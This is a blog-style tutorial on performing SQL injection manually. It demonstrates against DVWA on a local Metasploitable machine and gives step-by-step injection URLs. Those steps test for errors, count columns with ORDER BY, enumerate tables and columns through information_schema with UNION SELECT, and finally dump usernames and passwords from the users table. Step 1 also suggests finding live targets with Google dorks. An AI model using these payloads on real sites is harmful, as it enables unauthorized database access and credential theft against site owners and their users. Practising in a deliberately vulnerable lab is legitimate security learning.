how to do SQL Injection Manually

Namaste Friends,



Today, In This Post I Am Going To Show You How To Manually Perform SQL Injection Attacks On Web sites.

So, Let's Quickly Start Our Tutorial.

What Is SQL Injection Attack?


SQL injection is one type of vulnerability in web server. In Which, Attacker Can Insert

different type of SQL statements, syntax and commands (also commonly refers to as a malicious

payload.) and can also execute that statements on the server. read more >>


Friends Here, For Practise Purpose I Am Using DVWA (Damn Vulnerable Web application) On Local Server. As You Can See In Below Image But if you are new, read here >>>

SQL Injection Manually Tutorial Steps

Step 1.

                Our First Step is to find a target URL to exploit the sql vulnerability. Here, I am Using Metasploit-able vulnerable machine as target URL but you can also find live targets with the help of google dorks. For Google Dorks Usages Read Here

Target Url :

                 http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#




Step 2.

               Now, Our Second Step is To Verify That Our Selected Target Url is Vulnerable For SQL Injection Attack and for this, you just need to add '  after "=" Sign Or After The Number Query in Url.

After Editing Our Url Will Look Like This:


 http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#
or
 http://192.168.1.101/dvwa/vulnerabilities/sqli/?id='1&Submit=Submit#

And After Submitting Url, If You Get Any Type Of SQL Error Message Than Your Selected Target Is Vulnerable Of SQL Injection. As You Can See In Below ScreenShot.




Step 3.

            Now, We Need To Make Our URL Stable For Injecting Our SQL Statements Through URL.
And For This, You Just Need To Add --+ or # After The ' Query.

Then, Our Url Will Look Like This:

http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1'--+&Submit=Submit#

And After Submitting This Url, If Our Webpage is not showing any type of error that means our URL is now stable for injecting SQL Query.




Step 4.

              Now, Our Next Move Is To Find Total Number Of Columns Present In Current Working Table.
And For This, We Just Need To Add ' order by n' where n is a number of columns. basically, here we will use incrementing values and try to guess a number of columns available in the table. so, what we will do? we will increase column number one by one until Webpage Not Provide us Unknown Column Error Because with Unknown Columns Error We Can Easily Guess Numbers Of Columns Present In Table. For Example


http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' order by n --+&Submit=Submit#


http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' order by 1 --+&Submit=Submit# --> No Error

http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' order by 2 --+&Submit=Submit# --> No Error

http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' order by 3 --+&Submit=Submit# --> Error

Here, As you Can See We Get Error On Number 3 Column Means There are Only 2 Columns Available In Table.





Step 5.

           Now, We Know that there are 2 columns available in the table. so,  Our Next Step Is To Find Vulnerable Column In MySql And For This We Will Just Add Some Value In Place Of Column To Verify Their Presence In Web page Source.

For Example:

http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT 111, 101 --+&Submit=Submit#

After Submitting, Pay Attention to Webpage Content and try to find our injected column values in the webpage as you can see in below screenshot, Both Columns Are Vulnerable For SQL Injection.




Step 6.

           Now, We Know Which Column is Vulnerable For SQL injection. So, Let's Use This Vulnerable Column To Find Table names Available In Current Database.

To Find All Table Names :  http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT null, table_name FROM information_schema.tables --+&Submit=Submit#


To Find Current Table Name : http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=database() --+&Submit=Submit#

As You Can See In below ScreenShot, Webpage Is Showing Name Of Tables Available In Database.




Step 7.

           Now, We Know Which Columns are Vulnerable For SQL injection And Current Table Name. So, Let's Use This Information To Find Numbers Of Columns Available In Current Database Tables.

To Find All Column Names :  http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT null, column_name FROM information_schema.columns WHERE table_schema=database() --+&Submit=Submit#


As You Can See In below ScreenShot, Webpage Is Showing Name Of Tables Available In Database.







Step 8.

             At The End, To Extract user and password columns from Table. Enter Below Commands.

URL: http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT user, password FROM users --+&Submit=Submit#






Done!


Written By:
                 SSB











Share this

Related Posts

Previous
Next Post »